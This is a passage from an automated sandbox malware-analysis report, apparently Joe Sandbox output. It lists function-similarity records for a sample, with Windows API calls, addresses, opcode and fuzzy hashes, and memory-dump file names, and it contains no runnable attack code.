                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                    • Instruction ID: 2a17f7c09dd8bd0472bc3312ce01454a34ebe05d8bbd69847dc1ad557a44152b
                    • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                    • Instruction Fuzzy Hash: D611A531A0864181EB50EB25E982379A260FB847B4F944733DA7D062D4CFBCD592C352
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Item$RectText$ClientWindowswprintf
                    • String ID:
                    • API String ID: 402765569-0
                    • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                    • Instruction ID: 46331b31523b728cff2e43bb7823b1adfeee800c64201355583045aafa4ff6eb
                    • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                    • Instruction Fuzzy Hash: FB015221B0D28A51FF59F752A466BB9D3915F85B84F880076E84F06699DEFCF884C322
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7E1DCEBAD,?,?,?,?,00007FF7E1DC5752,?,?,?,00007FF7E1DC56DE), ref: 00007FF7E1DCEB5C
                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF7E1DCEB6F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Process$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1231390398-0
                    • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                    • Instruction ID: d50fd6e9cd76da92a1678d063b4fcec46cdedbe7dae7c1ed60ea634731c2f866
                    • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                    • Instruction Fuzzy Hash: 60E02B61F1454642DF18DF55C4426E9F3A2BFC8B40BC48137D60B83618DE3CE2558B11
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                    • String ID:
                    • API String ID: 1173176844-0
                    • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                    • Instruction ID: 990a80abfa05470a498815ed72c3ac677d054ae181652b568454eba36bc28062
                    • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                    • Instruction Fuzzy Hash: 27E0EC45E1910741FF2CF26218673B482400F69372EDC9732DA3E846C2ADBCE5918132
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorLanguagesLastPreferredRestoreThread
                    • String ID:
                    • API String ID: 588628887-0
                    • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                    • Instruction ID: 8c51252bcb54161403f0f70658400a87b9da129f26179061249e3f4613b790d7
                    • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                    • Instruction Fuzzy Hash: A5E08650F0990346FF0CFBB25C4737893915F98752B889036C90DC6252DEBCA5D18623
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
                    • Instruction ID: 743256e12cc52867bb358f7b5e7c182dcea3d737e41468bdf26bdb28625fdc23
                    • Opcode Fuzzy Hash: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
                    • Instruction Fuzzy Hash: 08D1B566B0868172EF28EB2595457B8E7A1FB05B84F840037CB5E077A5CF7CF4609322
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CompareString_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1017591355-0
                    • Opcode ID: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
                    • Instruction ID: bbb7da2f5f189732a54870b8248fa034e4b22753235e9f7663dc83d968b9b8d8
                    • Opcode Fuzzy Hash: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
                    • Instruction Fuzzy Hash: 7261CF91F0C64781EB64FA25841737AD291AF41BD4F944A33EE4D46AC6EEFCE441C2B2
                    APIs
                      • Part of subcall function 00007FF7E1DCE948: ReleaseSemaphore.KERNEL32 ref: 00007FF7E1DCE974
                      • Part of subcall function 00007FF7E1DCE948: FindCloseChangeNotification.KERNELBASE ref: 00007FF7E1DCE993
                      • Part of subcall function 00007FF7E1DCE948: DeleteCriticalSection.KERNEL32 ref: 00007FF7E1DCE9AA
                      • Part of subcall function 00007FF7E1DCE948: CloseHandle.KERNEL32 ref: 00007FF7E1DCE9B7
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD1ACB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1624603282-0
                    • Opcode ID: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
                    • Instruction ID: 4234df2b0ad66a137bd3821ab9cf20a46e8360769b5d602ea3d26a87b43d4904
                    • Opcode Fuzzy Hash: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
                    • Instruction Fuzzy Hash: 6B61B062B15685A2EF08EB65D5962BDB365FB40B90B944233D72D07AC1CFB8E4718311
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
                    • Instruction ID: 3efeca1471cbf7db4169cfae013dbefc2495d26f8a33b9a6ddc49453391f9770
                    • Opcode Fuzzy Hash: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
                    • Instruction Fuzzy Hash: C451D162A08682A0EB14FB2694467A9A751FB85BC4FC40137EE4E07392CFBDE485C361
                    APIs
                      • Part of subcall function 00007FF7E1DC3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7E1DD0811), ref: 00007FF7E1DC3EFD
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBE993
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1011579015-0
                    • Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                    • Instruction ID: 228d9a63ce32fb5005f21b6989da466d9e56013889344d292b9874871f7e4771
                    • Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                    • Instruction Fuzzy Hash: 80518F22A08A8691FF60EF25D44677DA365FF84B84F840137EA8E076A5CFBCD441C362
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
                    • Instruction ID: 61363a1312a4247c1fb4d423c89556b2d358192c95590c45f1ec7f37fa73ad2a
                    • Opcode Fuzzy Hash: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
                    • Instruction Fuzzy Hash: 5041D862B18A9191EB14EA17AA4137AE251FF84FC0F848536EE5C47F5ADFBCD4918340
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
                    • Instruction ID: 1b4d33f63a48ed8b112408b67d4d7dc52477ffa8c0d277c98077a26a9a5fd5d4
                    • Opcode Fuzzy Hash: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
                    • Instruction Fuzzy Hash: 54412323A08B0680EF14EF29E147379A361EB84BD8F940536EA4D07799CFBCE440C7A1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: HandleModule$AddressFreeLibraryProc
                    • String ID:
                    • API String ID: 3947729631-0
                    • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                    • Instruction ID: e51c3a9a47bc08eb024c7693ea98ac8b5fb565ca5f67740278f73f0bbd001dd4
                    • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                    • Instruction Fuzzy Hash: DB41C722F1860286FB18FB149452378A251BF54B42FC58477DA4D87695CFFDF881C7A2
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                    • String ID:
                    • API String ID: 680105476-0
                    • Opcode ID: ae4aa31824b7da0d77a8f4b9fb7a8218d847e075a5624bc92285f3cd7a959bae
                    • Instruction ID: 7c7b98aa523ca16a125ae0297751da8b4bacc6b36e513bddce4badd1629feaf7
                    • Opcode Fuzzy Hash: ae4aa31824b7da0d77a8f4b9fb7a8218d847e075a5624bc92285f3cd7a959bae
                    • Instruction Fuzzy Hash: 4421A122A09251A5EB14EA51B442779A250FB04BF0FA80B32DE3E47BC1EEBCE4518312
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                    • Instruction ID: 6855c9024a0566e65ee1bf30b1c71a4961cda4e00508572303daae31dfd0c871
                    • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                    • Instruction Fuzzy Hash: 98117F76E1C64286E710EB90A4837B9F2A4FB44380FD54136E68D87699DFBCE520C762
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                    • Instruction ID: b201d88b203d2996845660393533347d66834bd04dced6e3b8be98cfea522c4c
                    • Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                    • Instruction Fuzzy Hash: 1B010462E1878591EB15E728E44272DB361FF89790FC04232E69D07BA9DFBCE0408705
                    APIs
                      • Part of subcall function 00007FF7E1DE1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE162B
                    • DloadProtectSection.DELAYIMP ref: 00007FF7E1DE15C9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: DloadHandleModuleProtectSection
                    • String ID:
                    • API String ID: 2883838935-0
                    • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                    • Instruction ID: 9623c738a3a367721ff1aa0bc4bb6c30195e2822d0892750f821d21054995164
                    • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                    • Instruction Fuzzy Hash: 1B11EC60F0850781FB64FB04A843770A360AF1834AF9550B7D94D862A5EEBCB5D5C663
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                    • Instruction ID: 9d29412a639496145bd48ae8ec49049bcd98580090604e9f69a159fd7f63268e
                    • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                    • Instruction Fuzzy Hash: 77F04F51F1A20745FF5CFA6195133F692805F44B42FC89432C90ECA3C1EDBCA6814232
                    APIs
                      • Part of subcall function 00007FF7E1DC40BC: FindFirstFileW.KERNELBASE ref: 00007FF7E1DC410B
                      • Part of subcall function 00007FF7E1DC40BC: FindFirstFileW.KERNELBASE ref: 00007FF7E1DC415E
                      • Part of subcall function 00007FF7E1DC40BC: GetLastError.KERNEL32 ref: 00007FF7E1DC41AF
                    • FindClose.KERNELBASE(?,?,00000000,00007FF7E1DD0811), ref: 00007FF7E1DC3EFD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
